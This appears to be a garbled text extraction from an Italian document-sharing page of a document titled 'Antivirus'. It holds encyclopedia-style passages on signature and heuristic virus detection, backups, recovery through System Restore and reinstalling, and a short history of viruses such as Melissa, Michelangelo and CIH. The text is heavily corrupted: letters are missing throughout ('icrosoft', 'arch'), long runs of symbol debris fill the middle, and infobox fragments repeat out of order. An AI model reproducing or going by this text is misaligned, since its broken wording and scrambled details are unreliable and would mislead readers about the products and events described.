Because software is often designed with security features to prevent unauthorized use of system resources, many viruses must
exploit software bugs in a system or application to spread. Software development strategies that produce large numbers of bugs will
generally also produce potential exploits.
c
,
any users install anti- software that can detect and eliminate known viruses after the downloads or runs the
executable. There are two common methods that an anti- softwareapplication uses to detect viruses. The first, and by far the
most common method of detection is using a list of signature definitions. This works by examining the content of the
computer's memory (its RA, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and
comparing those files against a database of known "signatures". The disadvantage of this detection method is that users are
only protected from viruses that pre-date their last definition update. The second method is to use a heuristic algorithm to find
viruses based on common behaviors. This method has the ability to detect novel viruses that anti- security firms have yet to
create a signature for.
Some anti- programs are able to scan opened files in addition to sent and received e-mails "on the fly" in a similar manner.
This practice is known as "on-access scanning". Anti- software does not change the underlying capability of host software to
transmit viruses. Users must update their software regularly to patch security holes. Anti- software also needs to be regularly
updated in order to recognize the latest threats.
One may also minimize the damage done by viruses by making regular backups of data (and the operating systems) on different
media, that are either kept unconnected to the system (most of the time), read-only or not accessible for other reasons, such as
using different file systems. This way, if data is lost through a , one can start again using the backup (which should preferably
be recent).
If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a (so
long as a or infected file was not copied onto the CD/DVD). Likewise, an operating system on a bootable CD can be used to
start the if the installed operating systems become unusable. Backups on removable media must be carefully inspected
[31][32]
before restoration. The Gammima , for example, propagates via removable flash drives.
^ ,
Once a has been compromised by a , it is usually unsafe to continue using the same without completely
reinstalling the operating system. However, there are a number of recovery options that exist after a has a . These
actions depend on severity of the type of .
]
One possibility on Windows e, Windows XP, Windows Vista and Windows 7 is a tool known as System Restore, which restores
the registry and critical system files to a previous checkpoint. Often a will cause a system to hang, and a subsequent hard
reboot will render a system restore point from the same day corrupt. Restore points from previous days should work provided
[33]
the is not designed to corrupt the restore files or also exists in previous restore points. Some viruses, however, disable
System Restore and other important tools such as Task anager and Command Prompt. An example of a that does this is
CiaDoor. However, many such viruses can be removed by rebooting the , entering Windows safe mode, and then using
system tools.
Administrators have the option to disable such tools from limited users for various reasons (for example, to reduce potential damage
from and the spread of viruses). A can modify the registry to do the same even if the Administrator is controlling
the ; it blocks users including the administrator from accessing the tools. The message "Task anager has been
[

]
disabled by your administrator" may be displayed, even to the administrator.
Users running a icrosoft operating system can access icrosoft's website to run a free scan, provided they have their 20-digit
registration number. any websites run by anti- softwarecompanies provide free online scanning, with limited cleaning
facilities (the purpose of the sites is to sell anti- products). Some websites allow a single suspicious file to be checked by many
antivirus programs in one operation.
r
Reinstalling the operating system is another approach to removal. It involves either reformatting the computer's hard drive and
installing the OS and all programs from original media, or restoring the entire partition with a clean backup image. User data can be
restored by booting from a Live CD, or putting the hard drive into another and booting from its operating system with
great care not to infect the second by executing any infected programs on the original drive; and once the system has
been restored precautions must be taken to avoid reinfection from a restoredexecutable file.
These methods are simple to do, may be faster than disinfecting a , and are guaranteed to remove any malware. If the
operating system and programs must be reinstalled from scratch, the time and effort to reinstall, reconfigure, and restore user
preferences must be taken into account. Restoring from an image is much faster, totally safe, and restores the exact configuration to
the state it was in when the image was made, with no further trouble.
w

c

c

V
Î V
j

V
R

V
R

R

R

c

R c

R -

R

R

R

R

R c

c

R c

R

R j

R c

!
"
"
j
#

V
Î V
j

w

V
R

V
R c

R

R

R

R

w

R j

Î
j
w

c

V
R w

V
R

R w

c

R

R

c

R

#c"
R

R w

R

$

R c j

R c

R

"
%

R
w "

R c

w

w

V
Î V
ë

$

j

&

V

"
!
V
!

G -
"
" j
#

" j
#
"
w
''

'
'

'
&

"
w V
''
'
'
'
'
V
Î
ë

V
%

V
6

G !

( !

) * +
* w

, w

-
. / 0+ 0 1 2).) 0
3 c 4
-
j
4 5

4 '+

2 ë

+
)

)G 4 6 7 )2 "Î 4
+
c , $
$" Î +8j
'Î%
22

4
8 +
+ & 9 $
w

: w

2 w ; +
< -

2),= j
9 1
<
j
8'4)) 8
2G

5

"

w

c >

+

2(
2)

&

>

2,
2. 1

23
2

c

2 c

>

VVV V V

V
V V* V
V
V

&VVV V
V
V V/
V V
VV V V
VV&V
V
V
V
V
Î V

VV
VV
VV VV
V
V&VV VV V
V#
V
V V V &V VV V
V
VV
(V V
- V
Î
VV
V
VV
V V VV
&V
&V
V V V+
, V V
V

VV VV VVV V V

V
VV
V
V
V
V

V V V
V
V
V V V V
V
V+
V
V
VV VV
V
&V V V
V
0VV
VV V V V
) VV
V
VV
V
] VV

V V
V
&V&V+
, V VV
V
V V V
V
VV

Vc V
V
VVVV
&V VVV V
V V
c VV

VV
V
V

V VVV V+VV
V V
V
V

V
V&V VV V V VVV
V
VV VV V V
V
*V

1V
c
V
V
V
R V
R V
V
V
V
.*VV
V
V
1V2V
c
.$$
$/3$ ))45/6V
2,c j
+ .,*

Ô
*7
Dec 6, 2010
The elissa virus was the big story of 1999. Named after a lap dancer, elissa was the first major emailing virus.
Upon infection, it used icrosoft Outlook to send copies of itself to the first fifty names in the address book. arch,
1999, saw it spread across the Internet, clogging up email servers everywhere it went.
In 1990, a programmer named ark Washburn demonstrated a Polymorphic virus.called 1260. This virus could
actually change the structure of it's own code-meaning, every time it infected a new system, it looked different while
doing the same thing. In effect, this kind of virus "hides" from anti-virus software by wearing disguises.
ichelangelo was the first virus to achieve stardom. It was discovered in 1991, and was predicted to cause incredible
amounts of damage when it reached it's trigger date, arch 6th, 1992 (arch 6th is ichelangelo's birthday). If an
infected system is booted on arch 6th, the virus will erase the hard drive. Despite doomsday warnings made by the
press and the industry of "at least five million infected systems at risk," only about 10,000-20,000 computers
worldwide were hit by the virus.
The Concept virus was discovered in 1995. Concept is short for "Proof of Concept," and it was designed to show how
viruses could be written in the macro language programmed into icrosoft Word. By 2004, roughly 75% of all viruses
are macro viruses. It should also be noted that a lot of the viruses today are very easy to avoid. It's practically
become obvious when someone is trying to send you one.
The CIH virus, later renamed "Chernobyl," appeared in 1998. This was a very damaging virus that was not only
programmed to erase hard drives but also tried to erase BIOS chips. For the first time in history, a virus had managed
to actually damage the hardware it was running on. Fortunately, CIH wasn't very good at it, and only damaged a
handful of systems. Neither are a lot of the viruses that are programmed today.V

Antivirus

Caricato da

Informazioni sul documento

Descrizione originale:

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Antivirus

Caricato da

Copyright:

Formati disponibili

c  or   

 is used to prevent, detect, and remove computer viruses, worms,

V  V V

m V V V 

m V# V 

An example of free antivirus software:ClamTk 3.08.

alwarebytes' Anti-alware version 1.46 - a proprietary freeware antimalware product

(V  VV VVV V VVVVV V V

Using rkhunter to scan for rootkits on aUbuntu Linux computer.

Stable release VVV ! V" #$VV%

" #V&VV  V'V(V VV

$V ! V $V  ! V)*#$V%

License *  V

and phishing protection.

m V6  V7 V V !V

m 0V3 V V

include spyware and adware detection.

[edit]   !"#$

[edit]  % !&#$

[edit]  ' !(#$

[edit]  ) !#$

The main user interface of Norton AntiVirus 2009

ï  "Ú  

enters full-screen mode.

The Classic edition cannot find or remove adware and spyware.

[edit]  ! !%#$

[edit]  !! !'#$

The main GUI of Norton AntiVirus 2011

on August 31, 2010.

[edit]u   

PCs. [1] [2]

[edit]  

troubleshooting steps which were not always successful.

prevent users from installing multiple trial copies.

[edit]+    ,- c

Internet and which protocols they can use to do so.

[edit]Ô    

Preview release 1V&V@ V($V'VV  VV

Operating system  =  V

Type , V ! V

Website  B&&!!!

V3 V V

ClamTk 4.08 running on Ubuntu 9.04 Jaunty Jackalope

ë oon Secure AV[21]

ClamWin running on Windows XP

Stable release V0#V&VV@ V'V/V VV

Website !!!7  7

6 c  (Russian: Ⱥɧɬɢɜɢɪɭɫ Ʉɚɫɩɟɪɫɤɨɝɨ; formerly known as 

(VA :V  V

/V VD  V

Kaspersky Anti-Virus features include real-time protection, detection and removal

5 V 5 V 5 V

RAM (/V%4V (V%4V V24V (V%4V /0V%4V

Stable release 2V= VV0#V

Operating system  ! $VA :$34CV

License * V! V

m V  VV ! V 7 V

m V  VV , V

In response to complaints, AVG announced that as of July 9, 2008 "Search-Shield will no

ë When uninstalling AVG version 7 or 8 in Windows XP/Vista and attempting to install

ë AVG Anti-Virus was certified by ICSA Labs.[25]

   

,       

c or

is used to prevent, detect, and remove computer viruses, worms,

V V V

m VV V

m V# V

alwarebytes' Anti-alware version 1.46 - a proprietary freeware antimalware product

(V VVVVV V VVVVVV V

Stable release VVV ! V" #$VV%

" #V&VV V'V(V VV

$V ! V $V ! V)*#$V%

License * V

m V6 V7VV !V

m 0V3V V

[edit] !"#$

[edit] % !&#$

[edit] ' !(#$

[edit] ) !#$

ï "Ú

[edit] ! !%#$

[edit] !! !'#$

[edit]u

[edit]

[edit]+ ,- c

[edit]Ô

Preview release 1V&V@V($V'VV VV

Operating system = V

Type , V ! V

Website B&&!!!

V3V V

ë oon Secure AV[21]

Stable release V0#V&VV@V'V/V VV

Website !!!7 7

6c (Russian: Ⱥɧɬɢɜɢɪɭɫ Ʉɚɫɩɟɪɫɤɨɝɨ; formerly known as

(VA:V V

/V VD V

5V 5V 5V

RAM (/V%4V (V%4V V24V (V%4V /0V%4V

Stable release 2V= VV0#V

Operating system ! $VA:$34CV

License * V! V

m V VV ! V 7 V

m V VV , V

,

6

0V% VV, V

m 0V, V8V V VV 8V V

ë 0V=

(V8V V

m (V V,8VV V VV, V

m (V VVV !V , V

ë (0V+ V V V

V3V V

von Neumann postulated that a program could reproduce.

in assembler language for a SIEENS 4004/35 system.

new and continue propagating.

is executed on the .

Resident viruses are sometimes subdivided into a category of

ach-O format in OSX, and ELF files in Linux)

ë The master boot record (BR) of a hard disk

on USB emory Storage Devices).

and icrosoft Access database files)

PDFs, like HTL, may

ethods to avoid detection

that has been infected by the .

warns the user that a is probably active on the system.

A related strategy to make baiting difficult is

for scanners to at least flag the file as suspicious.

signature in many definitions.

actions depend on severity of the type of .

r

j

R

R w

''

2)

2 c